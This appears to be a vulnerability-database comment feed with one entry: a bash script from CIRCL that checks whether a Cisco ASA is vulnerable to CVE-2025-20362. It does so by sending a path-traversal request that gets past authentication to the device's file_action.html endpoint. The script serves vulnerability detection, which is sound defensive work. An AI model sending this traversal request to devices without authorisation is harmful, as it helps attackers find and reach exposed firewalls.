https://cve.circl.lu/comments/feed
Most recent comments.
2025-10-20T20:47:14.141832+00:00
Vulnerability-Lookup
info@circl.lu
python-feedgen
Contains only the most 10 recent comments.
https://cve.circl.lu/comment/9b4cf20c-8f3e-4626-8fdb-9a78038a672d
Check vulnerables ASA's script
2025-10-20T20:47:14.148737+00:00
Paul Jung
http://cve.circl.lu/user/thanat0s
The script is available there to check if an ASA is vulnerable.
https://gist.cnw.circl.lu/alexandre.dulaunoy/95ca6ae6259e4c8b899b916ee8b3d4a6
```bash
#!/bin/bash
# CIRCL - 2025
# Test CVE 2025-20362
# Ref : https://attackerkb.com/topics/Szq5u0xgUX/cve-2025-20362/rapid7-analysis
if [ -z "$1" ]; then
echo "Test for CVE-2025-20362"
echo "Usage: $0 <IP>"
exit 1
fi
IP="$1"
echo "Looking for CVE-2025-20362"
response=$(OPENSSL_CONF=<(
echo -e 'openssl_conf = openssl_init\n\n[openssl_init]\nssl_conf = ssl_sect\n\n[ssl_sect]'
echo -e 'system_default = system_default_sect\n\n[system_default_sect]\nOptions = UnsafeLegacyRenegotiation\n'
cat /etc/ssl/openssl.cnf
) curl "https://$IP/+CSCOU+//../+CSCOE+/files/file_action.html?mode=upload&path=foo&server=srv&sourceurl=qaz" \
-S --insecure -v -o - --path-as-is 2>&1)
if echo "$response" | grep -q "HTTP/1.1 404"; then
echo "Not vulnerable"
elif echo "$response" | grep -q "HTTP/1.1 200"; then
echo "Vulnerable"
fi
```
2025-10-06T16:25:58.212700+00:00